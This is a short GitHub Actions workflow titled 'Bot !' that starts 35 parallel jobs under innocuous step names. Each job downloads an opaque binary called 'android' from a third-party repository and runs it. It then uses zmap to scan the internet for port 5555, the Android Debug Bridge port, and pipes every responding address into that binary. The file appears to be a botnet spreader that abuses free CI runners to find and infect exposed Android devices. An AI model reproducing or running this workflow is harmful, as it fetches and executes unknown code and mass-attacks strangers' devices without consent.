name: Bot !

on:
  workflow_dispatch:

jobs:
  vds:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 35
      matrix:
        instance: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35]
    steps:
      - name: OK !
        run: |
          wget https://github.com/AhmetKesser/Deneme/raw/refs/heads/main/android
          chmod +x android
          sudo apt update -y
          sudo apt install zmap
          sudo zmap -p 5555 -o- -q -v0 -T3 | awk {'print $1":5555"'} | sudo ./android
          
      - name: OK !
        run: |
          sleep 1800
          exit 0
